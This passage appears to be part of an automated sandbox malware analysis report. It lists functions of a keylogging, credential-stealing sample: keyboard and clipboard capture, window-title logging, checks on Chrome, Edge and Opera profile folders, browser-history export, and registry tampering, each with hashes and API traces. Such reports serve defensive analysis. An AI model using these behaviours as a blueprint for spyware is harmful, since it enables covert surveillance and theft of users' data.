                        • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                        Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                          • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                          • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                        • Sleep.KERNEL32(000001F4), ref: 0040955A
                        • Sleep.KERNEL32(00000064), ref: 004095F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                        • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                        • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                        • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                        Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                        • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                        • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                        • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                        Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                        • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                        • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                        • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                        Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                        • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                        • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                        • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                        Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                        Download Yara Rule
                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                          • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                        Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                        • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                        • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                        • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                        Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                          • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                          • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                        Strings
                        • /sort "Visit Time" /stext ", xrefs: 00404092
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "
                        • API String ID: 368326130-1573945896
                        • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                        • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                        • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                        • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                        Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        • __Init_thread_footer.LIBCMT ref: 0040A6E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]
                        • API String ID: 1881088180-3686566968
                        • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                        • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                        • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                        • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                        Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                        • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                        • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                        • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                        Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                        • IsWindowVisible.USER32(?), ref: 00415B37
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$TextVisible
                        • String ID: (%G
                        • API String ID: 1670992164-3377777310
                        • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                        • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                        • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                        • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                        Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                        Strings
                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: Connection KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-507513762
                        • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                        • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                        • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                        • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                        Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                        • ___raise_securityfailure.LIBCMT ref: 00432E76
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: (F
                        • API String ID: 3761405300-3109638091
                        • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                        • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                        • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                        • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                        Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: | $%02i:%02i:%02i:%03i
                        • API String ID: 481472006-2430845779
                        • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                        • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                        • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                        • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                        Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: alarm.wav$x(G
                        • API String ID: 1174141254-2413638199
                        • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                        • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                        • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                        • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                        Function 00409F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • CloseHandle.KERNEL32(?), ref: 00409FFD
                        • UnhookWindowsHookEx.USER32 ref: 0040A010
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                        • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                        • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                        • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                        Function 0040B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                        • API String ID: 1174141254-2800177040
                        • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                        • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                        • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                        • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                        Function 0040B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                        • API String ID: 1174141254-4188645398
                        • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                        • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                        • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                        • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                        Function 0040B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: AppData$\Opera Software\Opera Stable\
                        • API String ID: 1174141254-1629609700
                        • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                        • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                        • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                        • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                        Function 0040A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040A597
                          • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                          • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                          • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                          • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                          • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                          • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                        • String ID: [AltL]$[AltR]
                        • API String ID: 3195419117-2658077756
                        • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                        • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                        • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                        • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                        Function 0040A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040A5F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                        • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                        • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                        • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                        Function 00412414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: 6h@
                        • API String ID: 2654517830-73392143
                        • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                        • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                        • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                        • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                        Function 0043B445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                        • GetLastError.KERNEL32 ref: 0043B4E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                        • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                        • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                        • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                        Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                        Download Yara Rule
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                        • SetLastError.KERNEL32(0000007F), ref: 004106DF
                        • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastRead
                        • String ID:
                        • API String ID: 4100373531-0
                        • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                        • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                        • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                        • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19